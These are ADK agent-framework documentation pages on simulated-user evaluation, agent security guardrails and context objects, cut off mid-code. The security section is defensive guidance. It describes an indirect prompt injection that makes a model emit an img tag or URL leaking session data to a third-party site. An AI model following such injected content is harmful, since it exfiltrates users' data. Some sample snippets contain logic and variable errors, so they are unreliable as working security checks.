ADKPython v1.18.0 When evaluating conversational agents, it is not always practical to use a fixed set of user prompts, as the conversation can proceed in unexpected ways. For example, if the agent needs the user to supply two values to perform a task, it may ask for those values one at a time or both at once. To resolve this issue, ADK can dynamically generate user prompts using a generative AI model. To use this feature, you must specify a [`ConversationScenario`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/conversation_scenarios.py) which dictates the user's goals in their conversation with the agent. A sample conversation scenario for the [`hello_world`](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world) agent is shown below: ```json { "starting_prompt": "What can you do for me?", "conversation_plan": "Ask the agent to roll a 20-sided die. After you get the result, ask the agent to check if it is prime." } ``` The `starting_prompt` in a conversation scenario specifies a fixed initial prompt that the user should use to start the conversation with the agent. Specifying such fixed prompts for subsequent interactions with the agent is not practical as the agent may respond in different ways. Instead, the `conversation_plan` provides a guideline for how the rest of the conversation with the agent should proceed. An LLM uses this conversation plan, along with the conversation history, to dynamically generate user prompts until it judges that the conversation is complete. Try it in Colab Test this entire workflow yourself in an interactive notebook on [Simulating User Conversations to Dynamically Evaluate ADK Agents](https://github.com/google/adk-samples/blob/main/python/notebooks/evaluation/user_simulation_in_adk_evals.ipynb). You'll define a conversation scenario, run a "dry run" to check the dialogue, and then perform a full evaluation to score the agent's responses. ## Example: Evaluating the [`hello_world`](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world) agent with conversation scenarios To add evaluation cases containing conversation scenarios to a new or existing [`EvalSet`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py), you need to first create a list of conversation scenarios to test the agent in. Try saving the following to `contributing/samples/hello_world/conversation_scenarios.json`: ```json { "scenarios": [ { "starting_prompt": "What can you do for me?", "conversation_plan": "Ask the agent to roll a 20-sided die. After you get the result, ask the agent to check if it is prime." }, { "starting_prompt": "Hi, I'm running a tabletop RPG in which prime numbers are bad!", "conversation_plan": "Say that you don't care about the value; you just want the agent to tell you if a roll is good or bad. Once the agent agrees, ask it to roll a 6-sided die. Finally, ask the agent to do the same with 2 20-sided dice." } ] } ``` You will also need a session input file containing information used during evaluation. Try saving the following to `contributing/samples/hello_world/session_input.json`: ```json { "app_name": "hello_world", "user_id": "user" } ``` Then, you can add the conversation scenarios to an `EvalSet`: ```bash # (optional) create a new EvalSet adk eval_set create \ contributing/samples/hello_world \ eval_set_with_scenarios # add conversation scenarios to the EvalSet as new eval cases adk eval_set add_eval_case \ contributing/samples/hello_world \ eval_set_with_scenarios \ --scenarios_file contributing/samples/hello_world/conversation_scenarios.json \ --session_input_file contributing/samples/hello_world/session_input.json ``` By default, ADK runs evaluations with metrics that require the agent's expected response to be specified. Since that is not the case for a dynamic conversation scenario, we will use an [`EvalConfig`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_config.py) with some alternate supported metrics. Try saving the following to `contributing/samples/hello_world/eval_config.json`: ```json { "criteria": { "hallucinations_v1": { "threshold": 0.5, "evaluate_intermediate_nl_responses": true }, "safety_v1": { "threshold": 0.8 } } } ``` Finally, you can use the `adk eval` command to run the evaluation: ```bash adk eval \ contributing/samples/hello_world \ --config_file_path contributing/samples/hello_world/eval_config.json \ eval_set_with_scenarios \ --print_detailed_results ``` ## User simulator configuration You can override the default user simulator configuration to change the model, internal model behavior, and the maximum number of user-agent interactions. The below `EvalConfig` shows the default user simulator configuration: ```json { "criteria": { # same as before }, "user_simulator_config": { "model": "gemini-2.5-flash", "model_configuration": { "thinking_config": { "include_thoughts": true, "thinking_budget": 10240 } }, "max_allowed_invocations": 20 } } ``` - `model`: The model backing the user simulator. - `model_configuration`: A [`GenerateContentConfig`](https://github.com/googleapis/python-genai/blob/6196b1b4251007e33661bb5d7dc27bafee3feefe/google/genai/types.py#L4295) which controls the model behavior. - `max_allowed_invocations`: The maximum user-agent interactions allowed before the conversation is forcefully terminated. This should be set to be greater than the longest reasonable user-agent interaction in your `EvalSet`. - `custom_instructions`: Optional. Overrides the default instructions for the user simulator. The instruction string must contain the following formatting placeholders exactly as shown below (*do not substitute values in advance!*): - `{stop_signal}` : text to be generated when the user simulator decides that the conversation is over. - `{conversation_plan}` : the overall plan for the conversation that the user simulator must follow. - `{conversation_history}` : the conversation between the user and the agent so far. # Safety and Security for AI Agents Supported in ADKPythonTypeScriptGoJava As AI agents grow in capability, ensuring they operate safely, securely, and align with your brand values is paramount. Uncontrolled agents can pose risks, including executing misaligned or harmful actions, such as data exfiltration, and generating inappropriate content that can impact your brand’s reputation. **Sources of risk include vague instructions, model hallucination, jailbreaks and prompt injections from adversarial users, and indirect prompt injections via tool use.** [Google Cloud Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/overview) provides a multi-layered approach to mitigate these risks, enabling you to build powerful *and* trustworthy agents. It offers several mechanisms to establish strict boundaries, ensuring agents only perform actions you've explicitly allowed: 1. **Identity and Authorization**: Control who the agent **acts as** by defining agent and user auth. 1. **Guardrails to screen inputs and outputs:** Control your model and tool calls precisely. - *In-Tool Guardrails:* Design tools defensively, using developer-set tool context to enforce policies (e.g., allowing queries only on specific tables). - *Built-in Gemini Safety Features:* If using Gemini models, benefit from content filters to block harmful outputs and system Instructions to guide the model's behavior and safety guidelines - *Callbacks and Plugins:* Validate model and tool calls before or after execution, checking parameters against agent state or external policies. - *Using Gemini as a safety guardrail:* Implement an additional safety layer using a cheap and fast model (like Gemini Flash Lite) configured via callbacks to screen inputs and outputs. 1. **Sandboxed code execution:** Prevent model-generated code to cause security issues by sandboxing the environment 1. **Evaluation and tracing**: Use evaluation tools to assess the quality, relevance, and correctness of the agent's final output. Use tracing to gain visibility into agent actions to analyze the steps an agent takes to reach a solution, including its choice of tools, strategies, and the efficiency of its approach. 1. **Network Controls and VPC-SC:** Confine agent activity within secure perimeters (like VPC Service Controls) to prevent data exfiltration and limit the potential impact radius. ## Safety and Security Risks Before implementing safety measures, perform a thorough risk assessment specific to your agent's capabilities, domain, and deployment context. ***Sources*** **of risk** include: - Ambiguous agent instructions - Prompt injection and jailbreak attempts from adversarial users - Indirect prompt injections via tool use **Risk categories** include: - **Misalignment & goal corruption** - Pursuing unintended or proxy goals that lead to harmful outcomes ("reward hacking") - Misinterpreting complex or ambiguous instructions - **Harmful content generation, including brand safety** - Generating toxic, hateful, biased, sexually explicit, discriminatory, or illegal content - Brand safety risks such as Using language that goes against the brand’s values or off-topic conversations - **Unsafe actions** - Executing commands that damage systems - Making unauthorized purchases or financial transactions. - Leaking sensitive personal data (PII) - Data exfiltration ## Best practices ### Identity and Authorization The identity that a *tool* uses to perform actions on external systems is a crucial design consideration from a security perspective. Different tools in the same agent can be configured with different strategies, so care is needed when talking about the agent's configurations. #### Agent-Auth The **tool interacts with external systems using the agent's own identity** (e.g., a service account). The agent identity must be explicitly authorized in the external system access policies, like adding an agent's service account to a database's IAM policy for read access. Such policies constrain the agent in only performing actions that the developer intended as possible: by giving read-only permissions to a resource, no matter what the model decides, the tool will be prohibited from performing write actions. This approach is simple to implement, and it is **appropriate for agents where all users share the same level of access.** If not all users have the same level of access, such an approach alone doesn't provide enough protection and must be complemented with other techniques below. In tool implementation, ensure that logs are created to maintain attribution of actions to users, as all agents' actions will appear as coming from the agent. #### User Auth The tool interacts with an external system using the **identity of the "controlling user"** (e.g., the human interacting with the frontend in a web application). In ADK, this is typically implemented using OAuth: the agent interacts with the frontend to acquire a OAuth token, and then the tool uses the token when performing external actions: the external system authorizes the action if the controlling user is authorized to perform it on its own. User auth has the advantage that agents only perform actions that the user could have performed themselves. This greatly reduces the risk that a malicious user could abuse the agent to obtain access to additional data. However, most common implementations of delegation have a fixed set permissions to delegate (i.e., OAuth scopes). Often, such scopes are broader than the access that the agent actually requires, and the techniques below are required to further constrain agent actions. ### Guardrails to screen inputs and outputs #### In-tool guardrails Tools can be designed with security in mind: we can create tools that expose the actions we want the model to take and nothing else. By limiting the range of actions we provide to the agents, we can deterministically eliminate classes of rogue actions that we never want the agent to take. In-tool guardrails is an approach to create common and re-usable tools that expose deterministic controls that can be used by developers to set limits on each tool instantiation. This approach relies on the fact that tools receive two types of input: arguments, which are set by the model, and [**`Tool Context`**](https://google.github.io/adk-docs/tools-custom/#tool-context), which can be set deterministically by the agent developer. We can rely on the deterministically set information to validate that the model is behaving as-expected. For example, a query tool can be designed to expect a policy to be read from the Tool Context. ```py # Conceptual example: Setting policy data intended for tool context # In a real ADK app, this might be set in InvocationContext.session.state # or passed during tool initialization, then retrieved via ToolContext. policy = {} # Assuming policy is a dictionary policy['select_only'] = True policy['tables'] = ['mytable1', 'mytable2'] # Conceptual: Storing policy where the tool can access it via ToolContext later. # This specific line might look different in practice. # For example, storing in session state: invocation_context.session.state["query_tool_policy"] = policy # Or maybe passing during tool init: query_tool = QueryTool(policy=policy) # For this example, we'll assume it gets stored somewhere accessible. ``` ```typescript // Conceptual example: Setting policy data intended for tool context // In a real ADK app, this might be set in InvocationContext.session.state // or passed during tool initialization, then retrieved via ToolContext. const policy: {[key: string]: any} = {}; // Assuming policy is an object policy['select_only'] = true; policy['tables'] = ['mytable1', 'mytable2']; // Conceptual: Storing policy where the tool can access it via ToolContext later. // This specific line might look different in practice. // For example, storing in session state: invocationContext.session.state["query_tool_policy"] = policy; // Or maybe passing during tool init: const queryTool = new QueryTool({policy: policy}); // For this example, we'll assume it gets stored somewhere accessible. ``` ```go // Conceptual example: Setting policy data intended for tool context // In a real ADK app, this might be set using the session state service. // `ctx` is an `agent.Context` available in callbacks or custom agents. policy := map[string]interface{}{ "select_only": true, "tables": []string{"mytable1", "mytable2"}, } // Conceptual: Storing policy where the tool can access it via ToolContext later. // This specific line might look different in practice. // For example, storing in session state: if err := ctx.Session().State().Set("query_tool_policy", policy); err != nil { // Handle error, e.g., log it. } // Or maybe passing during tool init: // queryTool := NewQueryTool(policy) // For this example, we'll assume it gets stored somewhere accessible. ``` ```java // Conceptual example: Setting policy data intended for tool context // In a real ADK app, this might be set in InvocationContext.session.state // or passed during tool initialization, then retrieved via ToolContext. policy = new HashMap(); // Assuming policy is a Map policy.put("select_only", true); policy.put("tables", new ArrayList<>("mytable1", "mytable2")); // Conceptual: Storing policy where the tool can access it via ToolContext later. // This specific line might look different in practice. // For example, storing in session state: invocationContext.session().state().put("query_tool_policy", policy); // Or maybe passing during tool init: query_tool = QueryTool(policy); // For this example, we'll assume it gets stored somewhere accessible. ``` During the tool execution, [**`Tool Context`**](https://google.github.io/adk-docs/tools-custom/#tool-context) will be passed to the tool: ```py def query(query: str, tool_context: ToolContext) -> str | dict: # Assume 'policy' is retrieved from context, e.g., via session state: # policy = tool_context.invocation_context.session.state.get('query_tool_policy', {}) # --- Placeholder Policy Enforcement --- policy = tool_context.invocation_context.session.state.get('query_tool_policy', {}) # Example retrieval actual_tables = explainQuery(query) # Hypothetical function call if not set(actual_tables).issubset(set(policy.get('tables', []))): # Return an error message for the model allowed = ", ".join(policy.get('tables', ['(None defined)'])) return f"Error: Query targets unauthorized tables. Allowed: {allowed}" if policy.get('select_only', False): if not query.strip().upper().startswith("SELECT"): return "Error: Policy restricts queries to SELECT statements only." # --- End Policy Enforcement --- print(f"Executing validated query (hypothetical): {query}") return {"status": "success", "results": [...]} # Example successful return ``` ```typescript function query(query: string, toolContext: ToolContext): string | object { // Assume 'policy' is retrieved from context, e.g., via session state: const policy = toolContext.state.get('query_tool_policy', {}) as {[key: string]: any}; // --- Placeholder Policy Enforcement --- const actual_tables = explainQuery(query); // Hypothetical function call const policyTables = new Set(policy['tables'] || []); const isSubset = actual_tables.every(table => policyTables.has(table)); if (!isSubset) { // Return an error message for the model const allowed = (policy['tables'] || ['(None defined)']).join(', '); return `Error: Query targets unauthorized tables. Allowed: ${allowed}`; } if (policy['select_only']) { if (!query.trim().toUpperCase().startsWith("SELECT")) { return "Error: Policy restricts queries to SELECT statements only."; } } // --- End Policy Enforcement --- console.log(`Executing validated query (hypothetical): ${query}`); return { "status": "success", "results": [] }; // Example successful return } ``` ```go import ( "fmt" "strings" "google.golang.org/adk/tool" ) func query(query string, toolContext *tool.Context) (any, error) { // Assume 'policy' is retrieved from context, e.g., via session state: policyAny, err := toolContext.State().Get("query_tool_policy") if err != nil { return nil, fmt.Errorf("could not retrieve policy: %w", err) } policy, _ := policyAny.(map[string]interface{}) actualTables := explainQuery(query) // Hypothetical function call // --- Placeholder Policy Enforcement --- if tables, ok := policy["tables"].([]string); ok { if !isSubset(actualTables, tables) { // Return an error to signal failure allowed := strings.Join(tables, ", ") if allowed == "" { allowed = "(None defined)" } return nil, fmt.Errorf("query targets unauthorized tables. Allowed: %s", allowed) } } if selectOnly, _ := policy["select_only"].(bool); selectOnly { if !strings.HasPrefix(strings.ToUpper(strings.TrimSpace(query)), "SELECT") { return nil, fmt.Errorf("policy restricts queries to SELECT statements only") } } // --- End Policy Enforcement --- fmt.Printf("Executing validated query (hypothetical): %s\n", query) return map[string]interface{}{"status": "success", "results": []string{"..."}}, nil } // Helper function to check if a is a subset of b func isSubset(a, b []string) bool { set := make(map[string]bool) for _, item := range b { set[item] = true } for _, item := range a { if _, found := set[item]; !found { return false } } return true } ``` ```java import com.google.adk.tools.ToolContext; import java.util.*; class ToolContextQuery { public Object query(String query, ToolContext toolContext) { // Assume 'policy' is retrieved from context, e.g., via session state: Map queryToolPolicy = toolContext.invocationContext.session().state().getOrDefault("query_tool_policy", null); List actualTables = explainQuery(query); // --- Placeholder Policy Enforcement --- if (!queryToolPolicy.get("tables").containsAll(actualTables)) { List allowedPolicyTables = (List) queryToolPolicy.getOrDefault("tables", new ArrayList()); String allowedTablesString = allowedPolicyTables.isEmpty() ? "(None defined)" : String.join(", ", allowedPolicyTables); return String.format( "Error: Query targets unauthorized tables. Allowed: %s", allowedTablesString); } if (!queryToolPolicy.get("select_only")) { if (!query.trim().toUpperCase().startswith("SELECT")) { return "Error: Policy restricts queries to SELECT statements only."; } } // --- End Policy Enforcement --- System.out.printf("Executing validated query (hypothetical) %s:", query); Map successResult = new HashMap<>(); successResult.put("status", "success"); successResult.put("results", Arrays.asList("result_item1", "result_item2")); return successResult; } } ``` #### Built-in Gemini Safety Features Gemini models come with in-built safety mechanisms that can be leveraged to improve content and brand safety. - **Content safety filters**: [Content filters](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/configure-safety-attributes) can help block the output of harmful content. They function independently from Gemini models as part of a layered defense against threat actors who attempt to jailbreak the model. Gemini models on Vertex AI use two types of content filters: - **Non-configurable safety filters** automatically block outputs containing prohibited content, such as child sexual abuse material (CSAM) and personally identifiable information (PII). - **Configurable content filters** allow you to define blocking thresholds in four harm categories (hate speech, harassment, sexually explicit, and dangerous content,) based on probability and severity scores. These filters are default off but you can configure them according to your needs. - **System instructions for safety**: [System instructions](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/safety-system-instructions) for Gemini models in Vertex AI provide direct guidance to the model on how to behave and what type of content to generate. By providing specific instructions, you can proactively steer the model away from generating undesirable content to meet your organization’s unique needs. You can craft system instructions to define content safety guidelines, such as prohibited and sensitive topics, and disclaimer language, as well as brand safety guidelines to ensure the model's outputs align with your brand's voice, tone, values, and target audience. While these measures are robust against content safety, you need additional checks to reduce agent misalignment, unsafe actions, and brand safety risks. #### Callbacks and Plugins for Security Guardrails Callbacks provide a simple, agent-specific method for adding pre-validation to tool and model I/O, whereas plugins offer a reusable solution for implementing general security policies across multiple agents. When modifications to the tools to add guardrails aren't possible, the [**`Before Tool Callback`**](https://google.github.io/adk-docs/callbacks/types-of-callbacks/#before-tool-callback) function can be used to add pre-validation of calls. The callback has access to the agent's state, the requested tool and parameters. This approach is very general and can even be created to create a common library of re-usable tool policies. However, it might not be applicable for all tools if the information to enforce the guardrails isn't directly visible in the parameters. ```py # Hypothetical callback function def validate_tool_params( callback_context: CallbackContext, # Correct context type tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext ) -> Optional[Dict]: # Correct return type for before_tool_callback print(f"Callback triggered for tool: {tool.name}, args: {args}") # Example validation: Check if a required user ID from state matches an arg expected_user_id = callback_context.state.get("session_user_id") actual_user_id_in_args = args.get("user_id_param") # Assuming tool takes 'user_id_param' if actual_user_id_in_args != expected_user_id: print("Validation Failed: User ID mismatch!") # Return a dictionary to prevent tool execution and provide feedback return {"error": f"Tool call blocked: User ID mismatch."} # Return None to allow the tool call to proceed if validation passes print("Callback validation passed.") return None # Hypothetical Agent setup root_agent = LlmAgent( # Use specific agent type model='gemini-2.0-flash', name='root_agent', instruction="...", before_tool_callback=validate_tool_params, # Assign the callback tools = [ # ... list of tool functions or Tool instances ... # e.g., query_tool_instance ] ) ``` ```typescript // Hypothetical callback function function validateToolParams( {tool, args, context}: { tool: BaseTool, args: {[key: string]: any}, context: ToolContext } ): {[key: string]: any} | undefined { console.log(`Callback triggered for tool: ${tool.name}, args: ${JSON.stringify(args)}`); // Example validation: Check if a required user ID from state matches an arg const expectedUserId = context.state.get("session_user_id"); const actualUserIdInArgs = args["user_id_param"]; // Assuming tool takes 'user_id_param' if (actualUserIdInArgs !== expectedUserId) { console.log("Validation Failed: User ID mismatch!"); // Return a dictionary to prevent tool execution and provide feedback return {"error": `Tool call blocked: User ID mismatch.`}; } // Return undefined to allow the tool call to proceed if validation passes console.log("Callback validation passed."); return undefined; } // Hypothetical Agent setup const rootAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'root_agent', instruction: "...", beforeToolCallback: validateToolParams, // Assign the callback tools: [ // ... list of tool functions or Tool instances ... // e.g., queryToolInstance ] }); ``` ```go import ( "fmt" "reflect" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/tool" ) // Hypothetical callback function func validateToolParams( ctx tool.Context, t tool.Tool, args map[string]any, ) (map[string]any, error) { fmt.Printf("Callback triggered for tool: %s, args: %v\n", t.Name(), args) // Example validation: Check if a required user ID from state matches an arg expectedUserID, err := ctx.State().Get("session_user_id") if err != nil { // This is an unexpected failure, return an error. return nil, fmt.Errorf("internal error: session_user_id not found in state: %w", err) } expectedUserID, ok := expectedUserIDVal.(string) if !ok { return nil, fmt.Errorf("internal error: session_user_id in state is not a string, got %T", expectedUserIDVal) } actualUserIDInArgs, exists := args["user_id_param"] if !exists { // Handle case where user_id_param is not in args fmt.Println("Validation Failed: user_id_param missing from arguments!") return map[string]any{"error": "Tool call blocked: user_id_param missing from arguments."}, nil } actualUserID, ok := actualUserIDInArgs.(string) if !ok { // Handle case where user_id_param is not a string fmt.Println("Validation Failed: user_id_param is not a string!") return map[string]any{"error": "Tool call blocked: user_id_param is not a string."}, nil } if actualUserID != expectedUserID { fmt.Println("Validation Failed: User ID mismatch!") // Return a map to prevent tool execution and provide feedback to the model. // This is not a Go error, but a message for the agent. return map[string]any{"error": "Tool call blocked: User ID mismatch."}, nil } // Return nil, nil to allow the tool call to proceed if validation passes fmt.Println("Callback validation passed.") return nil, nil } // Hypothetical Agent setup // rootAgent, err := llmagent.New(llmagent.Config{ // Model: "gemini-2.0-flash", // Name: "root_agent", // Instruction: "...", // BeforeToolCallbacks: []llmagent.BeforeToolCallback{validateToolParams}, // Tools: []tool.Tool{queryToolInstance}, // }) ``` ```java // Hypothetical callback function public Optional> validateToolParams( CallbackContext callbackContext, Tool baseTool, Map input, ToolContext toolContext) { System.out.printf("Callback triggered for tool: %s, Args: %s", baseTool.name(), input); // Example validation: Check if a required user ID from state matches an input parameter Object expectedUserId = callbackContext.state().get("session_user_id"); Object actualUserIdInput = input.get("user_id_param"); // Assuming tool takes 'user_id_param' if (!actualUserIdInput.equals(expectedUserId)) { System.out.println("Validation Failed: User ID mismatch!"); // Return to prevent tool execution and provide feedback return Optional.of(Map.of("error", "Tool call blocked: User ID mismatch.")); } // Return to allow the tool call to proceed if validation passes System.out.println("Callback validation passed."); return Optional.empty(); } // Hypothetical Agent setup public void runAgent() { LlmAgent agent = LlmAgent.builder() .model("gemini-2.0-flash") .name("AgentWithBeforeToolCallback") .instruction("...") .beforeToolCallback(this::validateToolParams) // Assign the callback .tools(anyToolToUse) // Define the tool to be used .build(); } ``` However, when adding security guardrails to your agent applications, plugins are the recommended approach for implementing policies that are not specific to a single agent. Plugins are designed to be self-contained and modular, allowing you to create individual plugins for specific security policies, and apply them globally at the runner level. This means that a security plugin can be configured once and applied to every agent that uses the runner, ensuring consistent security guardrails across your entire application without repetitive code. Some examples include: - **Gemini as a Judge Plugin**: This plugin uses Gemini Flash Lite to evaluate user inputs, tool input and output, and agent's response for appropriateness, prompt injection, and jailbreak detection. The plugin configures Gemini to act as a safety filter to mitigate against content safety, brand safety, and agent misalignment. The plugin is configured to pass user input, tool input and output, and model output to Gemini Flash Lite, who decides if the input to the agent is safe or unsafe. If Gemini decides the input is unsafe, the agent returns a predetermined response: "Sorry I cannot help with that. Can I help you with something else?". - **Model Armor Plugin**: A plugin that queries the model armor API to check for potential content safety violations at specified points of agent execution. Similar to the *Gemini as a Judge* plugin, if Model Armor finds matches of harmful content, it returns a predetermined response to the user. - **PII Redaction Plugin**: A specialized plugin with design for the [Before Tool Callback](/adk-docs/plugins/#tool-callbacks) and specifically created to redact personally identifiable information before it’s processed by a tool or sent to an external service. ### Sandboxed Code Execution Code execution is a special tool that has extra security implications: sandboxing must be used to prevent model-generated code to compromise the local environment, potentially creating security issues. Google and the ADK provide several options for safe code execution. [Vertex Gemini Enterprise API code execution feature](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/code-execution-api) enables agents to take advantage of sandboxed code execution server-side by enabling the tool_execution tool. For code performing data analysis, you can use the [Code Executor](/adk-docs/tools/gemini-api/code-execution/) tool in ADK to call the [Vertex Code Interpreter Extension](https://cloud.google.com/vertex-ai/generative-ai/docs/extensions/code-interpreter). If none of these options satisfy your requirements, you can build your own code executor using the building blocks provided by the ADK. We recommend creating execution environments that are hermetic: no network connections and API calls permitted to avoid uncontrolled data exfiltration; and full clean up of data across execution to not create cross-user exfiltration concerns. ### Evaluations See [Evaluate Agents](https://google.github.io/adk-docs/evaluate/index.md). ### VPC-SC Perimeters and Network Controls If you are executing your agent into a VPC-SC perimeter, that will guarantee that all API calls will only be manipulating resources within the perimeter, reducing the chance of data exfiltration. However, identity and perimeters only provide coarse controls around agent actions. Tool-use guardrails mitigate such limitations, and give more power to agent developers to finely control which actions to allow. ### Other Security Risks #### Always Escape Model-Generated Content in UIs Care must be taken when agent output is visualized in a browser: if HTML or JS content isn't properly escaped in the UI, the text returned by the model could be executed, leading to data exfiltration. For example, an indirect prompt injection can trick a model to include an img tag tricking the browser to send the session content to a 3rd party site; or construct URLs that, if clicked, send data to external sites. Proper escaping of such content must ensure that model-generated text isn't interpreted as code by browsers. # Components # Context Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 In the Agent Development Kit (ADK), "context" refers to the crucial bundle of information available to your agent and its tools during specific operations. Think of it as the necessary background knowledge and resources needed to handle a current task or conversation turn effectively. Agents often need more than just the latest user message to perform well. Context is essential because it enables: 1. **Maintaining State:** Remembering details across multiple steps in a conversation (e.g., user preferences, previous calculations, items in a shopping cart). This is primarily managed through **session state**. 1. **Passing Data:** Sharing information discovered or generated in one step (like an LLM call or a tool execution) with subsequent steps. Session state is key here too. 1. **Accessing Services:** Interacting with framework capabilities like: - **Artifact Storage:** Saving or loading files or data blobs (like PDFs, images, configuration files) associated with the session. - **Memory:** Searching for relevant information from past interactions or external knowledge sources connected to the user. - **Authentication:** Requesting and retrieving credentials needed by tools to access external APIs securely. 1. **Identity and Tracking:** Knowing which agent is currently running (`agent.name`) and uniquely identifying the current request-response cycle (`invocation_id`) for logging and debugging. 1. **Tool-Specific Actions:** Enabling specialized operations within tools, such as requesting authentication or searching memory, which require access to the current interaction's details. The central piece holding all this information together for a single, complete user-request-to-final-response cycle (an **invocation**) is the `InvocationContext`. However, you typically won't create or manage this object directly. The ADK framework creates it when an invocation starts (e.g., via `runner.run_async`) and passes the relevant contextual information implicitly to your agent code, callbacks, and tools. ```python # Conceptual Pseudocode: How the framework provides context (Internal Logic) # runner = Runner(agent=my_root_agent, session_service=..., artifact_service=...) # user_message = types.Content(...) # session = session_service.get_session(...) # Or create new # --- Inside runner.run_async(...) --- # 1. Framework creates the main context for this specific run # invocation_context = InvocationContext( # invocation_id="unique-id-for-this-run", # session=session, # user_content=user_message, # agent=my_root_agent, # The starting agent # session_service=session_service, # artifact_service=artifact_service, # memory_service=memory_service, # # ... other necessary fields ... # ) # # 2. Framework calls the agent's run method, passing the context implicitly # (The agent's method signature will receive it, e.g., runAsyncImpl(InvocationContext invocationContext)) # await my_root_agent.run_async(invocation_context) # --- End Internal Logic --- # # As a developer, you work with the context objects provided in method arguments. ``` ```typescript /* Conceptual Pseudocode: How the framework provides context (Internal Logic) */ const runner = new InMemoryRunner({ agent: myRootAgent }); const session = await runner.sessionService.createSession({ ... }); const userMessage = createUserContent(...); // --- Inside runner.runAsync(...) --- // 1. Framework creates the main context for this specific run const invocationContext = new InvocationContext({ invocationId: "unique-id-for-this-run", session: session, userContent: userMessage, agent: myRootAgent, // The starting agent sessionService: runner.sessionService, pluginManager: runner.pluginManager, // ... other necessary fields ... }); // // 2. Framework calls the agent's run method, passing the context implicitly await myRootAgent.runAsync(invocationContext); // --- End Internal Logic --- // As a developer, you work with the context objects provided in method arguments. ``` ```go /* Conceptual Pseudocode: How the framework provides context (Internal Logic) */ sessionService := session.InMemoryService() r, err := runner.New(runner.Config{ AppName: appName, Agent: myAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } s, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, }) if err != nil { log.Fatalf("FATAL: Failed to create session: %v", err) } scanner := bufio.NewScanner(os.Stdin) for { fmt.Print("\nYou > ") if !scanner.Scan() { break } userInput := scanner.Text() if strings.EqualFold(userInput, "quit") { break } userMsg := genai.NewContentFromText(userInput, genai.RoleUser) events := r.Run(ctx, s.Session.UserID(), s.Session.ID(), userMsg, agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }) fmt.Print("\nAgent > ") for event, err := range events { if err != nil { log.Printf("ERROR during agent execution: %v", err) break } fmt.Print(event.Content.Parts[0].Text) } } ``` ```java /* Conceptual Pseudocode: How the framework provides context (Internal Logic) */ InMemoryRunner runner = new InMemoryRunner(agent); Session session = runner .sessionService() .createSession(runner.appName(), USER_ID, initialState, SESSION_ID ) .blockingGet(); try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) { while (true) { System.out.print("\nYou > "); } String userInput = scanner.nextLine(); if ("quit".equalsIgnoreCase(userInput)) { break; } Content userMsg = Content.fromParts(Part.fromText(userInput)); Flowable events = runner.runAsync(session.userId(), session.id(), userMsg); System.out.print("\nAgent > "); events.blockingForEach(event -> System.out.print(event.stringifyContent())); } ``` ## The Different types of Context While `InvocationContext` acts as the comprehensive internal container, ADK provides specialized context objects tailored to specific situations. This ensures you have the right tools and permissions for the task at hand without needing to handle the full complexity of the internal context everywhere. Here are the different "flavors" you'll encounter: 1. **`InvocationContext`** - **Where Used:** Received as the `ctx` argument directly within an agent's core implementation methods (`_run_async_impl`, `_run_live_impl`). - **Purpose:** Provides access to the *entire* state of the current invocation. This is the most comprehensive context object. - **Key Contents:** Direct access to `session` (including `state` and `events`), the current `agent` instance, `invocation_id`, initial `user_content`, references to configured services (`artifact_service`, `memory_service`, `session_service`), and fields related to live/streaming modes. - **Use Case:** Primarily used when the agent's core logic needs direct access to the overall session or services, though often state and artifact interactions are delegated to callbacks/tools which use their own contexts. Also used to control the invocation itself (e.g., setting `ctx.end_invocation = True`). ```python # Pseudocode: Agent implementation receiving InvocationContext from google.adk.agents import BaseAgent from google.adk.agents.invocation_context import InvocationContext from google.adk.events import Event from typing import AsyncGenerator class MyAgent(BaseAgent): async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: # Direct access example agent_name = ctx.agent.name session_id = ctx.session.id print(f"Agent {agent_name} running in session {session_id} for invocation {ctx.invocation_id}") # ... agent logic using ctx ... yield # ... event ... ``` ```typescript // Pseudocode: Agent implementation receiving InvocationContext import { BaseAgent, InvocationContext, Event } from '@google/adk'; class MyAgent extends BaseAgent { async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { // Direct access example const agentName = ctx.agent.name; const sessionId = ctx.session.id; console.log(`Agent ${agentName} running in session ${sessionId} for invocation ${ctx.invocationId}`); // ... agent logic using ctx ... yield; // ... event ... } } ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/session" ) // Pseudocode: Agent implementation receiving InvocationContext type MyAgent struct { } func (a *MyAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { // Direct access example agentName := ctx.Agent().Name() sessionID := ctx.Session().ID() fmt.Printf("Agent %s running in session %s for invocation %s\n", agentName, sessionID, ctx.InvocationID()) // ... agent logic using ctx ... yield(&session.Event{Author: agentName}, nil) } } ``` ```java // Pseudocode: Agent implementation receiving InvocationContext import com.google.adk.agents.BaseAgent; import com.google.adk.agents.InvocationContext; LlmAgent root_agent = LlmAgent.builder() .model("gemini-***") .name("sample_agent") .description("Answers user questions.") .instruction( """ provide instruction for the agent here. """ ) .tools(sampleTool) .outputKey("YOUR_KEY") .build(); ConcurrentMap initialState = new ConcurrentHashMap<>(); initialState.put("YOUR_KEY", ""); InMemoryRunner runner = new InMemoryRunner(agent); Session session = runner .sessionService() .createSession(runner.appName(), USER_ID, initialState, SESSION_ID ) .blockingGet(); try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) { while (true) { System.out.print("\nYou > "); String userInput = scanner.nextLine(); if ("quit".equalsIgnoreCase(userInput)) { break; } Content userMsg = Content.fromParts(Part.fromText(userInput)); Flowable events = runner.runAsync(session.userId(), session.id(), 